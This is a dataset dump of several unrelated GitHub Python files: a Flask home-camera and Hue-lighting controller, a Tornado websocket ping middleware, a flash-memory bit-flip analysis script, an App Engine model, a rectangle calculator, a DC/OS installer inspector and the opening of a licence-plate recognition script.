camerasform.cameralist[index]\n id0 = ObjectId(camerasform.act_camera_id.data)\n DB.db_delete_one(\"cameras\", \"_id\", id0)\n camerasform.act_camera_id.data = \"-1\"\n camerasform.copyajaxdata(DB)\n result0 = render_template(\"config_cameraid.html\", camerasform=camerasform)\n elif cmd == \"camcheck\":\n check = request.args.get(\"check\", 0, type=str)\n checkbol = True if check == \"true\" else False\n camerasform = models.CamerasForm(request.form)\n camerasform.copyajaxdata(DB)\n camerasform.act_camera_id.data, _, _ = camerasform.cameralist[index]\n id0 = ObjectId(camerasform.act_camera_id.data)\n DB.db_update2(\"cameras\", \"_id\", id0, \"enable\", checkbol)\n camerasform.act_camera_id.data = \"-1\"\n camerasform.copyajaxdata(DB)\n result0 = render_template(\"config_cameraid.html\", camerasform=camerasform)\n elif cmd == \"camadd\":\n # insert code here\n camerasform = models.CamerasForm(request.form)\n camerasform.populate_with_defaults(DB)\n result0 = render_template(\"config_camedit.html\", camerasform=camerasform, camedit_action=\"add\")\n elif cmd == \"runtime_tgmode on\" or cmd == \"runtime_gettgmode\" or cmd == \"runtime_tgmode off\":\n GUCK_PATH = DB.db_query(\"remote\", \"guck_path\")\n REMOTE_HOST = DB.db_query(\"remote\", \"remote_host\")\n REMOTE_HOST_SHORT = DB.db_query(\"remote\", \"remote_host_short\")\n REMOTE_PORT = DB.db_query(\"remote\", \"remote_port\")\n REMOTE_SSH_PORT = DB.db_query(\"remote\", \"remote_ssh_port\")\n REMOTE_HOST_MAC = DB.db_query(\"remote\", \"remote_host_mac\")\n INTERFACE = DB.db_query(\"remote\", \"interface\")\n REMOTE_VIRTUALENV = DB.db_query(\"remote\", \"remote_virtualenv\")\n ZENZL = zenzlib.ZenzLib(REMOTE_HOST, REMOTE_HOST_MAC, INTERFACE, REMOTE_PORT, REMOTE_HOST_SHORT, REMOTE_SSH_PORT,\n GUCK_PATH, REMOTE_VIRTUALENV)\n if cmd == \"runtime_tgmode off\":\n sstr = \"tgmode silent\"\n elif cmd == \"runtime_tgmode on\":\n sstr = \"tgmode verbose\"\n else:\n sstr = \"gettgmode\"\n stat, res0 = ZENZL.request_to_guck(sstr, REMOTE_HOST, REMOTE_PORT)\n result0 = res0\n elif cmd == \"hue_getonoff\":\n return jsonify(result=get_hue_onoff(HUE))\n elif cmd == \"hue_on\":\n g = HUE.get_all_groups()\n HUE.set_groups_on(g)\n return jsonify(result=True)\n elif cmd == \"hue_off\":\n g = HUE.get_all_groups()\n HUE.set_groups_off(g)\n return jsonify(result=False)\n else:\n result0 = \"\"\n return jsonify(result=result0, status=PUSHT.guckstatus)\n\n\n@app.route(\"/configmsg\", methods=[\"GET\", \"POST\"])\n@flask_login.login_required\ndef configmsg():\n f = request.args.get(\"a\")\n print(f)\n return jsonify(feedback=f)\n\n\ndef get_sunrise_sunset():\n o = ephem.Observer()\n o.lat = DB.db_query(\"ephem\", \"lat\")\n o.long = DB.db_query(\"ephem\", \"long\")\n sun = ephem.Sun()\n sun.compute()\n sunset0 = ephem.localtime(o.next_setting(sun))\n sunrise0 = ephem.localtime(o.next_rising(sun))\n hh0 = str(sunset0.hour) if len(str(sunset0.hour)) > 1 else \"0\" + str(sunset0.hour)\n min0 = str(sunset0.minute) if len(str(sunset0.minute)) > 1 else \"0\" + str(sunset0.minute)\n hh1 = str(sunrise0.hour) if len(str(sunrise0.hour)) > 1 else \"0\" + str(sunrise0.hour)\n min1 = str(sunrise0.minute) if len(str(sunrise0.minute)) > 1 else \"0\" + str(sunrise0.minute)\n return hh0, min0, hh1, min1\n\n\ndef get_geo_timestr():\n hh0, min0, hh1, min1 = get_sunrise_sunset()\n return \"(\" + hh0 + \":\" + min0 + \"h - \" + hh1 + \":\" + min1 + \"h)\"\n\n\n@app.route(\"/location/\", methods=['GET', 'POST'])\n@flask_login.login_required\ndef location():\n global DB\n GUCK_PATH = DB.db_query(\"remote\", \"guck_path\")\n REMOTE_HOST = DB.db_query(\"remote\", \"remote_host\")\n REMOTE_HOST_SHORT = DB.db_query(\"remote\", \"remote_host_short\")\n REMOTE_PORT = DB.db_query(\"remote\", \"remote_port\")\n REMOTE_SSH_PORT = DB.db_query(\"remote\", \"remote_ssh_port\")\n REMOTE_HOST_MAC = DB.db_query(\"remote\", \"remote_host_mac\")\n INTERFACE = DB.db_query(\"remote\", \"interface\")\n REMOTE_VIRTUALENV = DB.db_query(\"remote\", \"remote_virtualenv\")\n ZENZL = zenzlib.ZenzLib(REMOTE_HOST, REMOTE_HOST_MAC, INTERFACE, REMOTE_PORT, REMOTE_HOST_SHORT, REMOTE_SSH_PORT,\n GUCK_PATH, REMOTE_VIRTUALENV)\n location_name = DB.db_query(\"ephem\", \"location\")\n location_long = DB.db_query(\"ephem\", \"long\")\n location_lat = DB.db_query(\"ephem\", \"lat\")\n hh0, min0, hh1, min1 = get_sunrise_sunset()\n sunset = hh0 + \":\" + min0 + \"h\"\n sunrise = hh1 + \":\" + min1 + \"h\"\n temp, hum = ZENZL.get_sens_temp()\n external_ips = ZENZL.get_external_ip()\n return render_template(\"location.html\", temp=round(temp, 1), hum=round(hum, 1), sunrise=sunrise, sunset=sunset,\n location_name=location_name, location_long=location_long, location_lat=location_lat,\n external_ips=external_ips)\n\n\n# @app.route(\"/hue//\", defaults={\"param1\": \"0\"}, methods=['GET', 'POST'])\n@app.route(\"/hue/\", defaults={\"selected_s\": \"0\"}, methods=['GET', 'POST'])\n@app.route(\"/hue//\", methods=['GET', 'POST'])\n@flask_login.login_required\ndef hue(selected_s=\"0\"):\n global HUE\n if request.method == \"GET\":\n scheduleform = models.ScheduleForm(request.form)\n # if called without parameter it's initial call, get schedule from DB\n if selected_s == \"0\":\n sel = \"1\"\n try:\n hue_sched = DB.db_query(\"hue\", \"schedule_type\")\n if len([hc for hc in DB.db_getall(\"hue\")]) == 0:\n DB.db_open_one(\"hue\", {\"schedule_type\": \"1\", \"startt\": \"19:00\", \"endt\": \"23:30\", \"duration\": 4, \"rshift\": 45,\n \"guckdur\": 15, \"onlynight\": False})\n sel = hue_sched\n except:\n sel = \"1\"\n if hue_sched == \"-1\":\n sel = \"1\"\n if sel == \"1\":\n HUE.delete_all_schedules()\n DB.db_update(\"hue\", \"schedule_type\", sel)\n scheduleform.populateform(DB)\n timestr = get_geo_timestr()\n return render_template(\"hue.html\", timestr=timestr, selected=sel, scheduleform=scheduleform, hue=get_hue_onoff(HUE))\n else:\n if selected_s == \"1\":\n HUE.delete_all_schedules()\n DB.db_update(\"hue\", \"schedule_type\", selected_s)\n scheduleform.populateform(DB)\n timestr = get_geo_timestr()\n return render_template(\"hue.html\", timestr=timestr, selected=str(selected_s), scheduleform=scheduleform,\n hue=get_hue_onoff(HUE))\n if request.method == \"POST\":\n scheduleform = models.ScheduleForm(request.form)\n sel = \"0\"\n if (scheduleform.submit_aw.data):\n if len([hc for hc in DB.db_getall(\"hue\")]) == 0:\n DB.db_open_one(\"hue\", {\"schedule_type\": \"2\", \"startt\": \"19:00\", \"endt\": \"23:30\", \"duration\": 4, \"rshift\": 45,\n \"guckdur\": 15, \"onlynight\": False})\n if not scheduleform.validate_on_submit():\n flash_errors(scheduleform)\n return render_template(\"hue.html\", selected=sel, scheduleform=scheduleform, hue=get_hue_onoff(HUE))\n # on GUCK alert\n if scheduleform.schedulenr.data == \"5\" and scheduleform.validate_on_submit():\n sel = scheduleform.schedulenr.data\n guckdur = int(scheduleform.on_guck_duration.data)\n onlynight = scheduleform.only_night.data\n DB.db_update(\"hue\", \"schedule_type\", sel)\n DB.db_update(\"hue\", \"guckdur\", guckdur)\n DB.db_update(\"hue\", \"onlynight\", onlynight)\n HUE.delete_all_schedules()\n gl = HUE.get_all_groups()\n HUE.set_groups_off(gl)\n\n # Random all week\n if scheduleform.schedulenr.data == \"4\" and scheduleform.validate_on_submit():\n sel = scheduleform.schedulenr.data\n startmins = int(scheduleform.starttime_hh.data)*60 + int(scheduleform.starttime_mm.data)\n dur = int(scheduleform.duration_hh.data)*60\n rsh = int(scheduleform.random_shift.data)\n DB.db_update(\"hue\", \"schedule_type\", sel)\n DB.db_update(\"hue\", \"startt\", scheduleform.starttime_hh.data + \":\" + scheduleform.starttime_mm.data)\n DB.db_update(\"hue\", \"endt\", scheduleform.endtime_hh.data + \":\" + scheduleform.endtime_mm.data)\n DB.db_update(\"hue\", \"duration\", int(scheduleform.duration_hh.data))\n DB.db_update(\"hue\", \"rshift\", int(scheduleform.random_shift.data))\n HUE.delete_all_schedules()\n gl = HUE.get_all_groups()\n HUE.set_groups_off(gl)\n for g0 in gl:\n HUE.set_weekly_random_schedules(g0, startmins, dur, rsh, rsh)\n\n # Fixed weekdays or allweek\n if scheduleform.schedulenr.data == \"2\" or scheduleform.schedulenr.data == \"3\":\n sel = scheduleform.schedulenr.data\n startmins = int(scheduleform.starttime_hh.data)*60 + int(scheduleform.starttime_mm.data)\n endmins = int(scheduleform.endtime_hh.data)*60 + int(scheduleform.endtime_mm.data)\n DB.db_update(\"hue\", \"schedule_type\", sel)\n DB.db_update(\"hue\", \"startt\", scheduleform.starttime_hh.data + \":\" + scheduleform.starttime_mm.data)\n DB.db_update(\"hue\", \"endt\", scheduleform.endtime_hh.data + \":\" + scheduleform.endtime_mm.data)\n HUE.delete_all_schedules()\n gl = HUE.get_all_groups()\n HUE.set_groups_off(gl)\n for g0 in gl:\n # Mon - Fri fixed\n if scheduleform.schedulenr.data == \"2\":\n HUE.set_schedule_weekdays(g0, startmins, True)\n HUE.set_schedule_weekdays(g0, endmins, False)\n # Mon - Sun Fixed\n elif scheduleform.schedulenr.data == \"3\":\n HUE.set_schedule_allweek(g0, startmins, True)\n HUE.set_schedule_allweek(g0, endmins, False)\n\n scheduleform.populateform(DB)\n timestr = get_geo_timestr()\n return render_template(\"hue.html\", timestr=timestr, selected=sel, scheduleform=scheduleform, hue=get_hue_onoff(HUE))\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000, debug=False)\n","repo_name":"dermatty/GUCK","sub_path":"bin/wastl/wastl.py","file_name":"wastl.py","file_ext":"py","file_size_in_byte":48779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28964487154","text":"import json\n\nfrom tornado_project.common_utilities.log import logger_info\nfrom tornado_project.common_utilities.ws_base import WSMiddleware\nfrom ..middleware import WS_CONNECT_USER_INFOS as user_infos\n\n\nclass PingMiddleware(WSMiddleware):\n '''\n 用于处理 ping-pong 交互\n - open 初始化用户信息\n - message 处理用户内 pong 数据\n - close 删除用户相关数据\n '''\n\n def process_open(self, ws):\n # print('PingMiddleware - open')\n user_infos['PingMiddleware'][ws] = dict(\n count=0,\n ping=None,\n )\n # print(user_infos)\n\n def process_message(self, ws):\n # print('PingMiddleware - message')\n logger_info.info('Ping Middleware handle message')\n msg = json.loads(ws.message)\n user_dic = user_infos['PingMiddleware'].get(ws)\n # 若pong满足条件,即重置对应user_times\n if 'pong' in msg:\n if user_dic and user_dic['ping'] == msg['pong']:\n user_infos['PingMiddleware'][ws]['count'] = 0\n\n def process_close(self,ws, *args, **kwargs):\n # print('PingMiddleware - close')\n if user_infos['PingMiddleware'].get(ws):\n # 若非自然断开连接,则删除字典内信息\n user_infos['PingMiddleware'].pop(ws)\n","repo_name":"Lin-SiYu/tornado-asyncio-project","sub_path":"tornado_project/common_utilities/middleware/pingmiddle.py","file_name":"pingmiddle.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38424404770","text":"import os\nimport sys\nimport shutil\nimport logging\nimport errno\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom collections import OrderedDict\n\nimport config\n\n# Flash info\nBLOCKS = 8192\nPAGES_IN_BLOCK = 64\nPAGE_BYTESIZE = 4096\nBYTES_IN_BLOCK = PAGES_IN_BLOCK*PAGE_BYTESIZE\n\n# Script options\nSAVE_TO_FILE = True\n\nclass FlashChecker(object):\n \"\"\"Class for checking the flash content readback\"\"\"\n def __init__(self, path, startblock, stopblock, first_byte_bug, is_inverted, name=\"block_{0}.dat\"):\n \"\"\"Init function\"\"\"\n self.path=None\n self.name=None\n self.startblock=None\n self.stopblock=None\n self.first_byte_bug = None\n self.is_inverted = None\n\n self.set_path(path)\n self.setup_logging()\n self.logger = logging.getLogger(\"FlashChecker\")\n self.set_name(name)\n self.set_blocks(startblock, stopblock)\n self.set_first_byte_bug(first_byte_bug)\n self.set_is_inverted(is_inverted)\n\n def set_path(self, path):\n assert os.path.isdir(path), \"{0} not existing\".format(path)\n self.path = path\n\n def set_name(self, name):\n self.name = name\n\n def set_blocks(self, startblock, stopblock):\n assert self.path is not None\n assert self.name is not None\n assert startblock <= stopblock\n assert stopblock < BLOCKS\n self.startblock = startblock\n self.stopblock = stopblock\n self.get_filepath(startblock)\n self.get_filepath(stopblock)\n\n def set_first_byte_bug(self, first_byte_bug):\n \"\"\"Set attribute first_byte_bug\n \"\"\"\n self.first_byte_bug = first_byte_bug\n\n def set_is_inverted(self, is_inverted):\n \"\"\"Set attribute is_inverted\n \"\"\"\n self.is_inverted = is_inverted\n\n def setup_logging(self):\n # Logging folder\n self.logdir = self.path + '/logs'\n try:\n if os.path.exists(self.logdir):\n shutil.rmtree(self.logdir)\n os.makedirs(self.logdir)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n # setup logging\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n log_file = os.path.join(self.logdir, \"flash.log\")\n log_file_errors = os.path.join(self.logdir,\n \"flash_errors.log\")\n\n fh = logging.FileHandler(log_file)\n fh.setLevel(logging.INFO)\n\n fh2 = logging.FileHandler(log_file_errors)\n fh2.setLevel(logging.ERROR)\n\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n\n fh.setFormatter(formatter)\n fh2.setFormatter(formatter)\n ch.setFormatter(formatter)\n\n logger.addHandler(fh)\n logger.addHandler(fh2)\n logger.addHandler(ch)\n\n def get_filepath(self, block):\n assert block in range(self.startblock, self.stopblock+1)\n path = self.path + '/' + self.name.format(block)\n assert os.path.exists(path), \"path {0} not existing\".format(path)\n return path\n\n def check_byte(self, byte, reference_byte):\n flip_1to0 = 0\n flip_0to1 = 0\n b_1count = bin(byte).count('1')\n ref_1count = bin(reference_byte).count('1')\n if b_1count < ref_1count:\n flip_1to0 = ref_1count - b_1count\n elif b_1count > ref_1count:\n flip_0to1 = b_1count - ref_1count\n #if flip_0to1 > 1 or flip_0to1 > 1:\n # self.logger.info(\"byte: {0}, flip 1to0: {1}, flip_0to1: {2}:, 1s in byte {3}, 1s in ref {4}\".format(byte, flip_1to0, flip_0to1, b_1count, ref_1count))\n return flip_1to0, flip_0to1\n\n def analyse_block(self, block):\n \"\"\"\"\"\"\n filepath = self.get_filepath(block)\n with open(filepath, \"rb\") as f:\n byte = f.read(1)\n bytecount = 0\n byteerrors = 0\n pagenr = 0\n flip_1to0 = 0\n flip_0to1 = 0\n double_1to0 = 0\n double_0to1 = 0\n triple_plus_1to0 = 0\n triple_plus_0to1 = 0\n while byte:\n new_byte = byte\n byte = new_byte[0]\n # Do stuff with byte.\n if self.is_inverted:\n byte = ~byte & 0xFF\n reference_value = b'\\xa5'[0]\n if bytecount % PAGE_BYTESIZE == 0:\n pagenr += 1\n if self.first_byte_bug:\n reference_value = b'@'[0]\n if byte != reference_value:\n #print(\"{0:08b} {1:08b} \".format(my_byte, reference_value))\n byteerrors += 1\n f1to0, f0to1 = self.check_byte(byte, reference_value)\n flip_1to0 += f1to0\n if f1to0 == 2:\n double_1to0 += f1to0\n elif f1to0 > 2:\n triple_plus_1to0 += f1to0\n flip_0to1 += f0to1\n if f0to1 == 2:\n double_0to1 += f0to1\n elif f0to1 > 2:\n triple_plus_0to1 += f0to1\n self.logger.debug(\"Error on byte {0}: 0to1 {1} 1to0 {2} d_0to1 {3} d_1to0 {4} t+0to1 {5} t+1to0 {6} (Byte is {7})\".format(bytecount,\n flip_0to1,\n flip_1to0,\n double_0to1,\n double_1to0,\n triple_plus_0to1,\n triple_plus_1to0,\n byte))\n byte = f.read(1)\n bytecount += 1\n self.logger.info(\"Done analysing block {2}. byteerrors {1}.\\t0to1 {3}, 1to0 {4},\\td_0to1 {5} d_1to0 {6},\\tt+0to1 {7} t+1to0 {8}\".format(bytecount,\n byteerrors,\n block,\n flip_0to1,\n flip_1to0,\n double_0to1,\n double_1to0,\n triple_plus_0to1,\n triple_plus_1to0))\n if byteerrors == BYTES_IN_BLOCK:\n self.logger.error(\"Done analysing block {2}. byteerrors {1}.\\t0to1 {3}, 1to0 {4},\\td_0to1 {5} d_1to0 {6},\\tt+0to1 {7} t+1to0 {8}\".format(bytecount,\n byteerrors,\n block,\n flip_0to1,\n flip_1to0,\n double_0to1,\n double_1to0,\n triple_plus_0to1,\n triple_plus_1to0))\n assert bytecount == BYTES_IN_BLOCK, \"bytecount {0}, BYTES_IN_BLOCK {1} in block {2}\".format(bytecount, BYTES_IN_BLOCK, block)\n return {'byteerrors': byteerrors, 'flip_1to0': flip_1to0, 'flip_0to1': flip_0to1, 'double_1to0': double_1to0, 'double_0to1': double_0to1, 'triple_plus_1to0': triple_plus_1to0, 'triple_plus_0to1': triple_plus_0to1}\n\ndef get_xs(fluence, upsets, analysed_blocks):\n \"\"\"Returns the cross section for the given fluence and number of blocks analysed\n \"\"\"\n xs = upsets/(fluence*analysed_blocks*PAGES_IN_BLOCK*PAGE_BYTESIZE)\n return xs\n\ndef gen_hist(array, key, basepath):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n hist = plt.hist(array, bins=500)\n ax.set_title(\"Histogram of {0} per block\".format(key))\n ax.set_xlabel(\"Number of {0} per block\".format(key))\n ax.set_ylabel(\"Occurrences\")\n if SAVE_TO_FILE:\n save_to_file(fig, key, basepath, '_hist')\n else:\n plt.show()\n return hist\n\ndef gen_plot(array, key, basepath, start_block=None):\n if start_block:\n block = list(range(start_block, start_block+len(array)))\n else:\n block = list(range(len(array)))\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.semilogy(block, array)\n ax.set_xlabel(\"Block number\")\n ax.set_ylabel(\"{0} per block\".format(key))\n ax.set_title(\"{0} vs block number\".format(key))\n if SAVE_TO_FILE:\n save_to_file(fig, key, basepath)\n else:\n plt.show()\n\ndef save_to_file(plt, key, basepath, name_modifier=''):\n # creates folder if it does not exist\n plotdir = basepath + '/logs/plots/'\n try:\n os.makedirs(plotdir)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n # Saves plot to file\n filename = \"{0}{1}{2}.pdf\".format(plotdir, key, name_modifier)\n plt.savefig(filename, bbox_inches='tight')\n\ndef main(analysis):\n analysed_blocks = 0\n HIST_KEYS = ['flip_0to1']\n PLOT_KEYS = ['flip_0to1']\n keys_order = {'byteerrors': 0, 'flip_1to0': 1, 'flip_0to1': 2, 'double_1to0': 3, 'double_0to1': 4, 'triple_plus_1to0': 5, 'triple_plus_0to1': 6}\n result = {'byteerrors': 0, 'flip_1to0': 0, 'flip_0to1': 0, 'double_1to0': 0, 'double_0to1': 0, 'triple_plus_1to0': 0, 'triple_plus_0to1': 0}\n results_dict = {'byteerrors': [], 'flip_1to0': [], 'flip_0to1': [], 'double_1to0': [], 'double_0to1': [], 'triple_plus_1to0': [], 'triple_plus_0to1': []}\n results = {}\n fc = FlashChecker(path=analysis.basepath, startblock=analysis.startblock, stopblock=analysis.stopblock, first_byte_bug=analysis.first_byte_bug, is_inverted=analysis.is_inverted)\n for i in range(fc.startblock, fc.stopblock+1):\n if i not in analysis.exclude_blocks:\n analysed_blocks += 1\n results[i] = fc.analyse_block(i)\n for key in result.keys():\n result[key] += results[i][key]\n fc.logger.info(result)\n\n for key in results.keys():\n for res_key in results_dict.keys():\n results_dict[res_key].append(results[key][res_key])\n for key in results_dict.keys():\n if key in HIST_KEYS:\n hist = gen_hist(results_dict[key], key, analysis.basepath)\n if key in PLOT_KEYS:\n gen_plot(results_dict[key], key, analysis.basepath, analysis.startblock)\n mean = np.mean(results_dict[key])\n std = np.std(results_dict[key])\n fc.logger.info(\"value {0} \\tmean {1}\\tstd {2}\".format(key, mean, std))\n\n # calculates xs is fluence is available\n xs = OrderedDict()\n if analysis.fluence is not None:\n for fluence in analysis.fluence:\n upsets_0to1 = result['flip_0to1'] + result['double_0to1'] + result['triple_plus_0to1']\n upsets_1to0 = result['flip_1to0'] + result['double_1to0'] + result['triple_plus_1to0']\n upsets_tot = upsets_0to1 + upsets_1to0\n xs_avg = get_xs(fluence=fluence, upsets=upsets_tot,\n analysed_blocks=analysed_blocks)\n xs_0to1 = get_xs(fluence=fluence, upsets=upsets_0to1,\n analysed_blocks=analysed_blocks/2)\n xs_1to0 = get_xs(fluence=fluence, upsets=upsets_1to0,\n analysed_blocks=analysed_blocks/2)\n xs[fluence] = {'avg': xs_avg,\n '0to1':xs_0to1,\n '1to0':xs_1to0}\n fc.logger.info(\"xs for {0:.02e} is {1}\".format(fluence, xs[fluence]))\n return result, results, xs\n\nif __name__ == '__main__':\n\n if len(sys.argv) < 2 or len(sys.argv) > 3 :\n sys.exit(\"Usage \\\"python {0} key [basepath]\\\"\".format(sys.argv[0]))\n key = sys.argv[1]\n if key not in config.analysis.keys():\n sys.exit(\"Key {0} not in {1}\".format(key, config.analysis.keys()))\n analysis = config.analysis[key]\n if len(sys.argv) == 3:\n basepath = sys.argv[2]\n assert os.path.exists(basepath)\n analysis.set_basepath(basepath)\n\n main(analysis)\n","repo_name":"zongzeliunt/LANL_P25_RU_Felix_GUI","sub_path":"RU_GUI_release/py_gui/flash_analysis/flash_test.py","file_name":"flash_test.py","file_ext":"py","file_size_in_byte":14476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70201405882","text":"# -*- coding: UTF-8 -*-\nfrom google.appengine.ext import db\nimport datetime\n\nclass DatSime(db.Model):\n Hizuke = db.DateTimeProperty(auto_now_add=False) # 伝票日付\n Busyo = db.IntegerProperty() # 部署CD\n SimeNitizi = db.DateTimeProperty(auto_now_add=False) # 締め日時\n InsatuNitizi = db.DateTimeProperty(auto_now_add=False) # 印刷日時\n\n def GetRec(self,Hizuke,Busyo):\n Sql = \"SELECT * FROM \" + self.__class__.__name__\n Sql += \" Where Hizuke = DATE('\" + Hizuke.replace(\"/\",\"-\") + \"')\"\n Sql += \" And Busyo = \" + str(Busyo)\n Snap = db.GqlQuery(Sql)\n if Snap.count() == 0:\n Rec = DatSime()\n Rec.Hizuke = datetime.datetime.strptime(Hizuke, '%Y/%m/%d')\n Rec.Busyo = int(Busyo)\n else:\n Rec = Snap.fetch(1)[0]\n return Rec\n\n def GetKikan(self,Hizuke,Days): # 指定日数分取得\n \n EndHizuke = datetime.datetime.strptime(Hizuke,\"%Y/%m/%d\") + datetime.timedelta(days=Days)\n\n Sql = \"SELECT * FROM \" + self.__class__.__name__\n Sql += \" Where Hizuke >= DATE('\" + Hizuke.replace(\"/\",\"-\") + \"')\"\n Sql += \" And Hizuke <= DATE('\" + EndHizuke.strftime('%Y-%m-%d') + \"')\"\n Query = db.GqlQuery(Sql)\n return Query.fetch(Query.count())\n\n def AddRec(self,Rec):\n self.Delete(Rec.Hizuke,Rec.Busyo)\n Rec.put()\n return \n\n def SetSime(self,Hizuke,Busyo,MODE):\n Rec = self.GetRec(Hizuke,Busyo)\n if MODE == \"ON\":\n Rec.SimeNitizi = datetime.datetime.now() + datetime.timedelta(hours=9) \n Rec.put()\n else:\n Rec.delete()\n return \n","repo_name":"YuziSumoto/wakokaiitem","sub_path":"DatSime.py","file_name":"DatSime.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"831216300","text":"# Mencetak panjang, lebar, keliling, dan luas dari persegi panjang \n# walaupun hanya ada 2 data yang diketahui \n# dengan syarat salah satunya merupakan panjang atau lebar\n\n# Keliling = 2 * (panjang + lebar) -> K = 2 * (p + l)\n# Luas = panjang * lebar -> L = p * l\n\n# Contoh data : \n# panjang = 4\n# lebar = 3\n# keliling = 14\n# luas = 12\n\ndef hitungKeliling():\n # memeriksa apakah data sudah ada\n if (k != 0):\n return k\n # menghitung menggunakan rumus\n else:\n return 2 * (p + l)\n \ndef hitungLuas():\n # memeriksa apakah data sudah ada\n if (L != 0):\n return L\n # menghitung menggunakan rumus\n else:\n return p * l\n\ndef hitungPanjang():\n global p, l\n \n # jika yang diketahui lebar dan keliling\n if (l != 0 and k != 0):\n # 2 * (p + l) = k\n # p + l = k / 2\n p = k / 2 - l\n # jika yang diketahui lebar dan luas\n elif (l != 0 and L != 0):\n # L = p * l\n # p * l = L\n p = L / l\n\n return p\n\ndef hitungLebar():\n global p, l\n\n # jika yang diketahui panjang dan keliling\n if (p != 0 and k != 0):\n l = k / 2 - p\n # jika yang diketahui lebar dan luas\n elif (p != 0 and L != 0):\n l = L / p\n \n return l\n\ndef main():\n # variabel global\n global p, l, k, L\n\n # meminta input dari pengguna \n # masukkan 0 jika nilai tidak diketahui (nilai yang akan dicari)\n p = int(input(\"Panjang (masukkan 0 jika tidak diketahui): \"))\n l = int(input(\"Lebar (masukkan 0 jika tidak diketahui): \"))\n k = int(input(\"Keliling (masukkan 0 jika tidak diketahui): \"))\n L = int(input(\"Luas (masukkan 0 jika tidak diketahui): \"))\n\n # mencetak hasil\n print(\"Panjang:\", hitungPanjang())\n print(\"Lebar:\", hitungLebar())\n print(\"Keliling:\", hitungKeliling())\n print(\"Luas:\", hitungLuas())\n\nmain()","repo_name":"grassnjellyn/Techa-Tika","sub_path":"Math-One-For-All/PersegiPanjang.py","file_name":"PersegiPanjang.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1660968409","text":"\"\"\"\nTools for getting details from DC/OS installer artifacts.\n\"\"\"\n\nimport json\nimport shutil\nimport subprocess\nimport uuid\nfrom enum import Enum\nfrom pathlib import Path\nfrom tempfile import gettempdir\nfrom typing import Optional\n\n\nclass DCOSVariant(Enum):\n \"\"\"\n Variants of DC/OS.\n \"\"\"\n\n OSS = 1\n ENTERPRISE = 2\n\n\nclass _DCOSInstallerDetails:\n \"\"\"\n Details of a DC/OS installer.\n\n Attributes:\n variant: The DC/OS variant which can be installed by a particular\n installer.\n version: The version of DC/OS which can be installed by a particular\n installer.\n \"\"\"\n\n def __init__(self, variant: DCOSVariant, version: str) -> None:\n \"\"\"\n Details of a DC/OS installer.\n\n Args:\n variant: The DC/OS variant which can be installed by a particular\n installer.\n version: The version of DC/OS which can be installed by a\n particular installer.\n \"\"\"\n self.variant = variant\n self.version = version\n\n\ndef get_dcos_installer_details(\n installer: Path,\n workspace_dir: Optional[Path] = None,\n keep_extracted: bool = False,\n) -> _DCOSInstallerDetails:\n \"\"\"\n Get details from a DC/OS artifact.\n\n Args:\n installer: The path to a DC/OS installer. This cannot include a\n space.\n workspace_dir: The directory in which large temporary files will be\n created.\n This is equivalent to `dir` in :py:func:`tempfile.mkstemp`.\n keep_extracted: Whether to keep the extracted artifact.\n\n Raises:\n ValueError: A space is in the installer path.\n CalledProcessError: There was an error extracting the given installer.\n \"\"\"\n if ' ' in str(installer):\n message = (\n 'No spaces allowed in path to the installer. '\n 'See https://jira.d2iq.com/browse/DCOS_OSS-4429.'\n )\n raise ValueError(message)\n\n workspace_dir = workspace_dir or Path(gettempdir())\n if not keep_extracted:\n workspace_dir = Path(workspace_dir) / uuid.uuid4().hex\n\n workspace_dir.mkdir(exist_ok=True, parents=True)\n\n # The installer interface is as follows:\n #\n # ```\n # $ bash dcos_generate_config.sh --version\n # Extracting image from this script and loading into docker daemon, this \\\n # step can take a few minutes\n # x dcos-genconf.75af9b2571de95e074-c74aa914537fa9f81b.tar\n # Loaded image: mesosphere/dcos-genconf: \\\n # 75af9b2571de95e074-c74aa914537fa9f81b\n # {\n # \"variant\": \"\",\n # \"version\": \"1.12.0-rc3\"\n # }\n # $ bash dcos_generate_config.sh --version\n # {\n # \"variant\": \"\",\n # \"version\": \"1.12.0-rc3\"\n # }\n # ```\n #\n # Therefore we use the installer twice to eliminate all non-JSON text.\n\n version_args = ['bash', str(installer), '--version']\n\n subprocess.check_output(\n args=version_args,\n cwd=str(workspace_dir),\n stderr=subprocess.PIPE,\n )\n\n result = subprocess.check_output(\n args=version_args,\n cwd=str(workspace_dir),\n stderr=subprocess.PIPE,\n )\n\n version_info = json.loads(result.decode())\n\n version = version_info['version']\n variant = {\n 'ee': DCOSVariant.ENTERPRISE,\n '': DCOSVariant.OSS,\n }[version_info['variant']]\n\n if not keep_extracted:\n shutil.rmtree(path=str(workspace_dir))\n\n return _DCOSInstallerDetails(version=version, variant=variant)\n","repo_name":"dcos/dcos-e2e","sub_path":"src/dcos_e2e_cli/_vendor/dcos_installer_tools/artifact_utils.py","file_name":"artifact_utils.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"40"} +{"seq_id":"36817420292","text":"import os\nimport sys\nimport argparse\nfrom datetime import datetime, date\nfrom pathlib import Path\n\nimport csv\nfrom uuid import uuid1\n\nfrom cv2 import VideoCapture, imread, imwrite, CAP_PROP_FPS, CAP_PROP_FRAME_COUNT\nimport torch\nfrom easyocr import Reader\n\nfrom modules.detection.detect import detect_plate\nfrom modules.recognition.recognize import recognize_text_with_easyocr\n\n######################################\n# ROOT path\n######################################\n\nFILE = Path(__file__).resolve()\nROOT = 